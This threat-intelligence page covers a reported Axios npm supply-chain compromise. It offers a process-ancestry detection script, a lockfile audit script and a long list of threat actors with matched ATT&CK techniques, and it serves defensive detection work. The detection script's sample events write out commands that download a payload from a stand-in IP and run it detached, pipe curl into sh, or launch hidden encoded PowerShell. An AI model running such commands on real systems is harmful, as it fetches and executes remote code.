Trusted Design

Detections for the Axios supply chain compromise

Summary

A supply chain attack targeting Axios npm package versions 1.14.1 and 0.30.4 introduced a malicious transitive dependency (plain-crypto-js@4.2.1) that executed during installation. The attack deploys cross-platform payloads across Linux, Windows, and macOS through a consistent pattern: Node.js spawns OS-native shells to retrieve and execute remote payloads in detached or hidden contexts. Linux victims receive a Python-based RAT, Windows systems get a PowerShell backdoor with registry persistence, and macOS hosts are compromised with a Mach-O binary backdoor. All variants beacon to the same C2 infrastructure, performing host fingerprinting, process enumeration, filesystem reconnaissance, and arbitrary code execution. The malicious activity is reliably detected through behavioral signatures focusing on unusual Node.js process ancestry and remote payload retrieval rather than static indicators.
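The process-ancestry signal the summary relies on can be written as a small rule set that runs over normalised process-creation events. The block below is an added example for this page, not code from the pulse or from the Axios project. It assumes events normalised to the keys host, os, parent_image, image and cmdline (map them from Sysmon Event ID 1, auditd EXECVE records or your EDR's process telemetry); every sample event is constructed, and 203.0.113.0/24 is a documentation range, not real C2. The rule fires only when a shell whose direct parent is Node.js carries a download primitive or an encoded command, and escalates when that is combined with a detached or hidden context (nohup, setsid, a trailing &, -WindowStyle Hidden, start /b), which is the cross-platform pattern the summary describes.

```python
"""Behavioural detection of the Node.js -> OS shell -> remote payload pattern.

Added example, not code from the pulse or the Axios project. Assumes events
normalised to host/os/parent_image/image/cmdline. Samples are constructed;
203.0.113.0/24 is a documentation range, not real infrastructure.
"""
import re

NODE_IMAGES = {"node", "node.exe", "nodejs"}
SHELL_IMAGES = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}

# Patterns key on behaviour (download, detached/hidden execution, staging in temp,
# encoded commands), not on campaign hostnames or filenames, so they survive rotation.
FETCH = [
    ("curl", re.compile(r"\bcurl\b")),
    ("wget", re.compile(r"\bwget\b")),
    ("ps-web", re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|"
                          r"DownloadString|DownloadFile|Net\.WebClient", re.I)),
    ("py-http", re.compile(r"\burllib\b|\brequests\.get\b")),
]
STEALTH = [
    ("nohup", re.compile(r"\bnohup\b")),
    ("setsid", re.compile(r"\bsetsid\b")),
    ("disown", re.compile(r"\bdisown\b")),
    ("backgrounded", re.compile(r"\s&\s*[\"')]*\s*$")),   # trailing '&' inside sh -c "..."
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("start-b", re.compile(r"\bstart\s+/b\b", re.I)),
]
STAGE_EXEC = [
    ("pipe-to-interpreter", re.compile(r"\|\s*(?:sh|bash|python3?|perl)\b")),
    ("iex", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("encoded-command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("chmod-exec", re.compile(r"chmod\s+\+x")),
    ("temp-staging", re.compile(r"/tmp/|/var/tmp/|/dev/shm/|\\Temp\\|%TEMP%", re.I)),
]


def _basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def _hits(patterns, cmdline):
    return [name for name, rx in patterns if rx.search(cmdline)]


def evaluate(event):
    """Score one process-creation event; returns an alert dict or None."""
    # Scope: only shells whose direct parent is Node.js. A shell from node is normal
    # for npm scripts, so the shell alone never alerts; the command line decides.
    if _basename(event.get("parent_image", "")) not in NODE_IMAGES:
        return None
    if _basename(event.get("image", "")) not in SHELL_IMAGES:
        return None
    cmd = event.get("cmdline", "")
    fetch, stealth, stage = _hits(FETCH, cmd), _hits(STEALTH, cmd), _hits(STAGE_EXEC, cmd)
    # Trigger on a visible download, or on an encoded command that can hide one.
    if not fetch and "encoded-command" not in stage:
        return None
    if stealth:
        severity = "high"      # detached/hidden execution plus a fetch: page someone
    elif stage:
        severity = "medium"    # fetch chained into an interpreter, temp staging or encoding
    else:
        severity = "low"       # bare download from a node-spawned shell: triage
    return {"host": event.get("host"), "os": event.get("os"), "severity": severity,
            "fetch": fetch, "stealth": stealth, "stage": stage, "cmdline": cmd}


def run_detections(events):
    """Evaluate a batch of events; alerts come back in input order."""
    return [alert for alert in map(evaluate, events) if alert]


def _ev(host, os_, parent, image, cmdline):
    return {"host": host, "os": os_, "parent_image": parent, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real incident
    # Linux: node-spawned sh fetches a script to /tmp and runs it detached (nohup ... &)
    _ev("lin-build-01", "linux", "/usr/local/bin/node", "/bin/sh",
        'sh -c "nohup curl -fsSL http://203.0.113.10/loader.py -o /tmp/.cache.py '
        '&& python3 /tmp/.cache.py >/dev/null 2>&1 &"'),
    # Windows: node.exe -> cmd.exe -> hidden PowerShell with an encoded command (dummy base64)
    _ev("win-dev-07", "windows", r"C:\Program Files\nodejs\node.exe", r"C:\Windows\System32\cmd.exe",
        'cmd.exe /d /s /c "powershell -NoProfile -WindowStyle Hidden -enc '
        'QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"'),
    # macOS: fetch a binary, mark it executable, run it in the background
    _ev("mac-ci-03", "macos", "/usr/local/bin/node", "/bin/bash",
        'bash -c "curl -s http://203.0.113.10/agent -o /tmp/.agent && chmod +x /tmp/.agent && /tmp/.agent &"'),
    # Benign npm scripts: shells from node, no download, no hiding
    _ev("lin-build-01", "linux", "/usr/local/bin/node", "/bin/sh", 'sh -c "eslint . && tsc --noEmit"'),
    _ev("mac-ci-03", "macos", "/usr/local/bin/node", "/bin/sh", 'sh -c "node-gyp rebuild"'),
    # curl from an interactive shell: out of scope (parent is not node)
    _ev("lin-build-01", "linux", "/bin/bash", "/usr/bin/curl", "curl -fsSL https://example.com/install.sh"),
    # Download with no staging or hiding: worth a look, not a page
    _ev("lin-build-02", "linux", "/usr/bin/node", "/bin/sh",
        'sh -c "curl -sSf https://example.com/schema.json -o schema.json"'),
    # Download piped straight into sh, but in the foreground
    _ev("mac-ci-03", "macos", "/usr/local/bin/node", "/bin/sh", 'sh -c "curl -s http://203.0.113.10/u.sh | sh"'),
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], alert["fetch"], alert["stealth"], alert["stage"])
```

Shells spawned by node are routine for npm lifecycle scripts, so the shell alone is never an alert; only the command line escalates. The low-severity bare downloads are the tuning surface, since legitimate build steps do fetch schemas and toolchains; an allowlist of the registry and artifact hosts your CI is permitted to reach is the usual way to quiet them without dropping the high-severity combinations.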
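Before hunting for the behaviour, confirm exposure. The following is an added example, not code from the pulse or the Axios project: it audits an npm lockfile for the two Axios versions and the plain-crypto-js version named in the summary, and also lists every package npm recorded with hasInstallScript, because an install-time script is where this payload executed. It handles both the flat packages map of lockfileVersion 2 and 3 and the nested dependencies tree of lockfileVersion 1. Both sample lockfiles are constructed, and the command-line entry point (lockfile path as the first argument) is an assumption about how it would be wired into CI.

```python
"""Audit an npm lockfile for the versions named in the pulse and for install scripts.

Added example, not code from the pulse or the Axios project. Affected versions are
taken from the pulse summary; sample lockfiles are constructed.
"""
import json
import sys

# Versions named in the pulse. Extend as advisories update; do not loosen to ranges.
AFFECTED = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}


def iter_packages(lock):
    """Yield (path, name, info) for every installed package in a v1, v2 or v3 lockfile."""
    if "packages" in lock:                     # lockfileVersion 2/3: flat map keyed by path
        for path, info in lock["packages"].items():
            if not path:                       # "" is the root project itself
                continue
            name = info.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield path, name, info
        return

    def walk(deps, prefix):                    # lockfileVersion 1: nested dependency tree
        for name, info in deps.items():
            path = f"{prefix}node_modules/{name}"
            yield path, name, info
            yield from walk(info.get("dependencies", {}), path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def audit_lockfile(lock):
    """Return (kind, path, name@version) findings: compromised versions, plus any
    package npm recorded as having install scripts, since that is where the payload ran."""
    findings = []
    for path, name, info in iter_packages(lock):
        spec = f"{name}@{info.get('version', '?')}"
        if info.get("version") in AFFECTED.get(name, ()):
            findings.append(("compromised-version", path, spec))
        if info.get("hasInstallScript"):
            findings.append(("install-script", path, spec))
    return findings


SAMPLE_LOCK_V3 = json.loads("""{
  "name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "dependencies": {"axios": "^1.14.0"}},
    "node_modules/axios": {"version": "1.14.1", "dependencies": {"plain-crypto-js": "4.2.1"}},
    "node_modules/plain-crypto-js": {"version": "4.2.1", "hasInstallScript": true},
    "node_modules/follow-redirects": {"version": "1.15.9"}
  }
}""")   # constructed

SAMPLE_LOCK_V1 = json.loads("""{
  "name": "legacy-app", "lockfileVersion": 1, "dependencies": {
    "axios": {"version": "0.30.4", "dependencies": {"plain-crypto-js": {"version": "4.2.1"}}},
    "lodash": {"version": "4.17.21"}
  }
}""")   # constructed

if __name__ == "__main__":
    # Assumed CLI shape: python audit_lock.py package-lock.json ; non-zero exit fails the build.
    with open(sys.argv[1]) as fh:
        lock = json.load(fh)
    findings = audit_lockfile(lock)
    for kind, path, spec in findings:
        print(f"{kind:20} {spec:28} {path}")
    sys.exit(1 if any(k == "compromised-version" for k, _, _ in findings) else 0)
```

A clean audit does not clear a host on which an install already ran with the bad versions; pair it with the process-ancestry detection. Where the project tolerates it, run CI installs with npm ci --ignore-scripts so that a future malicious install hook cannot execute at all, and treat any new install-script finding in a lockfile diff as a review item.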

Created: 2026-05-07

Indicators

Similar Pulses

No similar Pulses were found.

Threat actors related to this Pulse (fact-based)

HAFNIUM

Score: 9.43
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1049 - System Network Connections Discovery

menuPass

Score: 18.53
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1527 - Application Access Token
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

Wizard Spider

Score: 17.20
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

APT33

Score: 4.12
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1051 - Shared Webroot

Fox Kitten

Score: 11.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1177 - LSASS Driver
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1601.001 - Patch System Image

Volt Typhoon

Score: 37.73
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1686.003 - Windows Host Firewall
  • T1003.007 - Proc Filesystem
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1049 - System Network Connections Discovery
  • T1488 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1546.016 - Installer Packages
  • T1665 - Hide Infrastructure

APT1

Score: 11.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

Mustang Panda

Score: 27.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1169 - Sudo
  • T1136.003 - Cloud Account
  • T1055.005 - Thread Local Storage

Play

Score: 6.72
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

Chimera

Score: 16.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

Sea Turtle

Score: 6.73
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups

APT39

Score: 13.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery

RedCurl

Score: 17.21
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1051 - Shared Webroot
  • T1027.004 - Compile After Delivery
  • T1055.009 - Proc Memory

APT5

Score: 13.09
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1106 - Native API
  • T1578.003 - Delete Cloud Instance
  • T1055.004 - Asynchronous Procedure Call

Agrius

Score: 7.96
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

GALLIUM

Score: 15.26
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1059.004 - Unix Shell

APT41

Score: 26.77
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1106 - Native API
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1578.003 - Delete Cloud Instance
  • T1055.004 - Asynchronous Procedure Call
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window

MuddyWater

Score: 27.99
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1547.012 - Print Processors
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image

APT28

Score: 16.43
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1222.002 - Linux and Mac Permissions
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1547.011 - Plist Modification
  • T1200 - Hardware Additions

Turla

Score: 30.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1099 - Timestomp
  • T1063 - Security Software Discovery
  • T1003.007 - Proc Filesystem
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1059.004 - Unix Shell
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1546.016 - Installer Packages

BRONZE BUTLER

Score: 12.10
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1592.004 - Client Configurations
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery

UNC3886

Score: 16.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1021.006 - Windows Remote Management
  • T1597 - Search Closed Sources
  • T1059.004 - Unix Shell
  • T1488 - Disk Content Wipe
  • T1027.004 - Compile After Delivery

Kimsuky

Score: 39.40
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1654 - Log Enumeration
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

APT3

Score: 18.48
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1059.004 - Unix Shell

FIN8

Score: 8.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image

Ke3chang

Score: 24.80
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1198 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account

Lotus Blossom

Score: 7.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

FIN13

Score: 19.72
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1134.001 - Token Impersonation/Theft

Earth Lusca

Score: 15.99
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1027.004 - Compile After Delivery
  • T1546.016 - Installer Packages

Magic Hound

Score: 26.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1099 - Timestomp
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image

Aquatic Panda

Score: 10.81
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.007 - Proc Filesystem
  • T1106 - Native API
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

INC Ransom

Score: 14.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1055.009 - Proc Memory

Akira

Score: 10.27
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1137.005 - Outlook Rules
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

ToddyCat

Score: 6.16
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1055.004 - Asynchronous Procedure Call
  • T1665 - Hide Infrastructure

APT29

Score: 30.07
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1202 - Indirect Command Execution
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1592.004 - Client Configurations
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery

APT32

Score: 25.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1592.004 - Client Configurations
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

Saint Bear

Score: 6.11
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources

FIN6

Score: 11.60
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image

Sidewinder

Score: 8.59
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1601.001 - Patch System Image

Winter Vivern

Score: 11.09
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1055.013 - Process Doppelgänging
  • T1090 - Proxy
  • T1087.004 - Cloud Account

Silence

Score: 6.58
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1601.001 - Patch System Image

Contagious Interview

Score: 28.64
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1021.006 - Windows Remote Management
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1651 - Cloud Administration Command

LazyScripter

Score: 8.10
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image

TA505

Score: 19.48
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image

FIN7

Score: 12.78
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1098.007 - Additional Local or Domain Groups
  • T1055.013 - Process Doppelgänging
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image

Cobalt Group

Score: 18.00
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

Higaisa

Score: 8.25
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure

Indrik Spider

Score: 16.28
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1183 - Image File Execution Options Injection
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1546.016 - Installer Packages

Leafminer

Score: 6.36
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot
  • T1601.001 - Patch System Image

Star Blizzard

Score: 8.71
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection

HEXANE

Score: 14.55
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1601.001 - Patch System Image

Gamaredon Group

Score: 28.16
Matched TTPs:
  • T1099 - Timestomp
  • T1527 - Application Access Token
  • T1547.012 - Print Processors
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
  • T1200 - Hardware Additions

TA2541

Score: 6.06
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1597 - Search Closed Sources

Mustard Tempest

Score: 4.54
Matched TTPs:
  • T1682 - Query Public AI Services

Daggerfly

Score: 9.27
Matched TTPs:
  • T1584.008 - Network Devices
  • T1530 - Data from Cloud Storage
  • T1546.016 - Installer Packages

Dragonfly

Score: 24.51
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1654 - Log Enumeration
  • T1531 - Account Access Removal
  • T1027.004 - Compile After Delivery
  • T1200 - Hardware Additions
  • T1546.016 - Installer Packages

Threat Group-3390

Score: 7.31
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

Ember Bear

Score: 9.66
Matched TTPs:
  • T1584.008 - Network Devices
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources

OilRig

Score: 22.54
Matched TTPs:
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1003.007 - Proc Filesystem
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1059.004 - Unix Shell
  • T1592.002 - Software

Tropic Trooper

Score: 19.35
Matched TTPs:
  • T1195.001 - Compromise Software Dependencies and Development Tools
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1136.003 - Cloud Account
  • T1200 - Hardware Additions
  • T1665 - Hide Infrastructure

Scattered Spider

Score: 29.99
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window

Storm-0501

Score: 16.91
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1686.003 - Windows Host Firewall
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1055.009 - Proc Memory

Sandworm Team

Score: 37.93
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1686.003 - Windows Host Firewall
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1183 - Image File Execution Options Injection
  • T1055.004 - Asynchronous Procedure Call
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1075 - Pass the Hash
  • T1601.001 - Patch System Image
  • T1546.016 - Installer Packages

Leviathan

Score: 23.47
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1546.016 - Installer Packages

Medusa Group

Score: 16.64
Matched TTPs:
  • T1547.012 - Print Processors
  • T1106 - Native API
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image

TeamTNT

Score: 17.43
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1665 - Hide Infrastructure

Poseidon Group

Score: 4.26
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1055.004 - Asynchronous Procedure Call

admin@338

Score: 5.73
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call

PROMETHIUM

Score: 3.84
Matched TTPs:
  • T1530 - Data from Cloud Storage

Patchwork

Score: 11.69
Matched TTPs:
  • T1530 - Data from Cloud Storage
  • T1059.004 - Unix Shell
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure

Lazarus Group

Score: 30.90
Matched TTPs:
  • T1106 - Native API
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1546.016 - Installer Packages
  • T1055.005 - Thread Local Storage
  • T1665 - Hide Infrastructure

Storm-1811

Score: 8.40
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact

APT42

Score: 5.27
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances

ZIRCONIUM

Score: 7.30
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery

EXOTIC LILY

Score: 3.80
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection

Silent Librarian

Score: 3.80
Matched TTPs:
